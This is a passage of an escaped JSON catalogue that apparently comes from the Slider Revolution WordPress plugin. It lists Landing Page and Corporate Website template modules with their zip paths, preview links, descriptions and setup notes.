Action\",\"alias\":\"landing-page-call-to-action\",\"zip\":\"packs\\/landing-page-call-to-action.zip\",\"uid\":\"adfb456b27fa7eb6b1415d8f80836f05\",\"img\":\"landing-page-call-to-action\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"334\":{\"id\":\"359\",\"title\":\"Landing Page Help\",\"alias\":\"landing-page-help\",\"zip\":\"packs\\/landing-page-help.zip\",\"uid\":\"ca502431f9b7f6249d99b02464de2dd7\",\"img\":\"landing-page-help\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"335\":{\"id\":\"360\",\"title\":\"Landing Page Footer\",\"alias\":\"landing-page-footer\",\"zip\":\"packs\\/landing-page-footer.zip\",\"uid\":\"2a6afc371dbd60cb117f8a0f5d09eac9\",\"img\":\"landing-page-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"336\":{\"id\":\"361\",\"title\":\"Landing Page Price Modal\",\"alias\":\"landing-page-price-modal\",\"zip\":\"packs\\/landing-page-price-modal.zip\",\"uid\":\"a6c5c0430b46dd4e6e68416964a8c54d\",\"img\":\"landing-page-price-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"337\":{\"id\":\"371\",\"title\":\"Corporate Website\",\"alias\":\"corporate-website\",\"zip\":\"\",\"uid\":\"corporate-website-package\",\"img\":\"packages\\/corporate-website.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"338\":{\"id\":\"372\",\"title\":\"Corporate Header\",\"alias\":\"Corporate-Header\",\"zip\":\"packs\\/Corporate-Header.zip\",\"uid\":\"04f868e3812a1681f00ab89580e5d1f8\",\"img\":\"Corporate-Header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"339\":{\"id\":\"373\",\"title\":\"Corporate Welcome Screen\",\"alias\":\"Corporate-Welcome-Screen\",\"zip\":\"packs\\/Corporate-Welcome-Screen.zip\",\"uid\":\"052afe98ef819f7ace041dbbdb749639\",\"img\":\"Corporate-Welcome-Screen\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"340\":{\"id\":\"374\",\"title\":\"Corporate About\",\"alias\":\"Corporate-About\",\"zip\":\"packs\\/Corporate-About.zip\",\"uid\":\"7bf5f8f6d4cc3016cea86289cb46e5b6\",\"img\":\"Corporate-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"341\":{\"id\":\"375\",\"title\":\"Corporate Portfolio\",\"alias\":\"Corporate-Portfolio\",\"zip\":\"packs\\/Corporate-Portfolio.zip\",\"uid\":\"612c2bd784fea81392dda1644a3c3cf3\",\"img\":\"Corporate-Portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"342\":{\"id\":\"376\",\"title\":\"Corporate Chart\",\"alias\":\"Corporate-Chart\",\"zip\":\"packs\\/Corporate-Chart.zip\",\"uid\":\"4d27d9b3b2cfcce750e526aafb322a9f\",\"img\":\"Corporate-Chart\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"343\":{\"id\":\"377\",\"title\":\"Corporate News\",\"alias\":\"Corporate-News\",\"zip\":\"packs\\/Corporate-News.zip\",\"uid\":\"bb65ed57a0d4db795d8b738f0a92f2d7\",\"img\":\"Corporate-News\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"344\":{\"id\":\"378\",\"title\":\"Corporate Hiring\",\"alias\":\"Corporate-Hiring\",\"zip\":\"packs\\/Corporate-Hiring.zip\",\"uid\":\"136cf1a91604e819089eb3573a6e100a\",\"img\":\"Corporate-Hiring\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"345\":{\"id\":\"379\",\"title\":\"Corporate Testimonials\",\"alias\":\"Corporate-Testimonials\",\"zip\":\"packs\\/Corporate-Testimonials.zip\",\"uid\":\"b17aec0afdc31e37359cfa406164463c\",\"img\":\"Corporate-Testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"346\":{\"id\":\"380\",\"title\":\"Corporate Store\",\"alias\":\"Corporate-Store\",\"zip\":\"packs\\/Corporate-Store.zip\",\"uid\":\"6240b14620ddc634736716e0cdfdeb31\",\"img\":\"Corporate-Store\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"347\":{\"id\":\"381\",\"title\":\"Corporate Support\",\"alias\":\"Corporate-Support\",\"zip\":\"packs\\/Corporate-Support.zip\",\"uid\":\"9424292a78076ce68c2faf587b26cdad\",\"img\":\"Corporate-Support\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"348\":{\"id\":\"382\",\"title\":\"Corporate Team\",\"alias\":\"Corporate-Team\",\"zip\":\"packs\\/Corporate-Team.zip\",\"uid\":\"4fafe469b5a0a2545625c3f6d7ff3b9e\",\"img\":\"Corporate-Team\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"11\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"349\":{\"id\":\"383\",\"title\":\"Corporate Selected Projects Title\",\"alias\":\"Corporate-Selected-Projects-Title\",\"zip\":\"packs\\/Corporate-Selected-Projects-Title.zip\",\"uid\":\"0ed3c41f51e6bf404c2fe179fa8d8ceb\",\"img\":\"Corporate-Selected-Projects-Title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"12\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"350\":{\"id\":\"384\",\"title\":\"Corporate Selected Projects\",\"alias\":\"Corporate-Selected-Projects\",\"zip\":\"packs\\/Corporate-Selected-Projects.zip\",\"uid\":\"1096c78d5f007f3900228a4092515e2e\",\"img\":\"Corporate-Selected-Projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"13\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"351\":{\"id\":\"385\",\"title\":\"Corporate Clients\",\"alias\":\"Corporate-Clients\",\"zip\":\"packs\\/Corporate-Clients.zip\",\"uid\":\"60fe3a311195bf4dba3e50bd1ab98574\",\"img\":\"Corporate-Clients\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"14\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"352\":{\"id\":\"386\",\"title\":\"Corporate Text Block\",\"alias\":\"Corporate-Text-Block\",\"zip\":\"packs\\/Corporate-Text-Block.zip\",\"uid\":\"93b68bb23d65fd1028b6b5f6d19b85b5\",\"img\":\"Corporate-Text-Block\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"15\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"353\":{\"id\":\"387\",\"title\":\"Corporate Mobile App\",\"alias\":\"Corporate-Mobile-App\",\"zip\":\"packs\\/Corporate-Mobile-App.zip\",\"uid\":\"e592369d233bea673403daa15c6e498a\",\"img\":\"Corporate-Mobile-App\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"16\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"354\":{\"id\":\"388\",\"title\":\"Corporate Contacts\",\"alias\":\"Corporate-Contacts\",\"zip\":\"packs\\/Corporate-Contacts.zip\",\"uid\":\"91ae9488b54b7020f8ae9dfbfd6c563a\",\"img\":\"Corporate-Contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"17\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"355\":{\"id\":\"389\",\"title\":\"Corporate Footer\",\"alias\":\"Corporate-Footer\",\"zip\":\"packs\\/Corporate-Footer.zip\",\"uid\":\"a01df90af203f06194c1a18745d79861\",\"img\":\"Corporate-Footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"18\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"356\":{\"id\":\"390\",\"title\":\"Corporate Scroll To Top\",\"alias\":\"Corporate-Scroll-To-Top\",\"zip\":\"packs\\/Corporate-Scroll-To-Top.zip\",\"uid\":\"2d68f6e4590a9a445e6eb055dfee88ba\",\"img\":\"Corporate-Scroll-To-Top\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/corporate-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!<\\/span>\\r\\n<span 